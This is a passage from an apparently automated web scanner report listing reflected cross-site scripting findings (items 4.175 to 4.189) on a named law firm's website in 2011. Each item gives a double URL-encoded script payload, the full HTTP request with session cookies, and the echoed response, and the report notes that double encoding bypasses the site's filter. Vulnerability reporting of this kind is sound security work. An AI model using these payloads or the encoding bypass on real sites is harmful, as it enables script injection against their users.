<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui612ba"><script>alert(1)</script>8b00486b426/ui.progressbar.css" value="">
...[SNIP]...

4.175. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.progressbar.css13c9c"><script>alert(1)</script>4a99b88c02e" value="">
...[SNIP]...

4.176. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css14fad"><script>alert(1)</script>9c0b0ee56be/ui/ui.resizable.css" value="">
...[SNIP]...

4.177. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3fcda"><script>alert(1)</script>8c138520eda/ui.resizable.css" value="">
...[SNIP]...

4.178. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.resizable.cssf779c"><script>alert(1)</script>382088a8c20" value="">
...[SNIP]...

4.179. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssc2d5f"><script>alert(1)</script>87253ed8d10/ui/ui.slider.css" value="">
...[SNIP]...

4.180. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui7d474"><script>alert(1)</script>1e1c925c625/ui.slider.css" value="">
...[SNIP]...

4.181. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.slider.csseb3ab"><script>alert(1)</script>de52d4ea844" value="">
...[SNIP]...

4.182. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csse5847"><script>alert(1)</script>63b9f9dcf48/ui/ui.tabs.css" value="">
...[SNIP]...

4.183. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui81a0d"><script>alert(1)</script>ee949bf1e89/ui.tabs.css" value="">
...[SNIP]...

4.184. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.tabs.cssb92b8"><script>alert(1)</script>93dc2b44d56" value="">
...[SNIP]...

4.185. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssf8b59"><script>alert(1)</script>b748a2e0a4d/ui/ui.theme.css" value="">
...[SNIP]...

4.186. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui9f482"><script>alert(1)</script>5de43e0d372/ui.theme.css" value="">
...[SNIP]...

4.187. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.theme.css20285"><script>alert(1)</script>9291800f59c" value="">
...[SNIP]...

4.188. http://www.wileyrein.com/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/index.cfm30fea"><script>alert(1)</script>818c7828cb8" value="">
...[SNIP]...

4.189. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
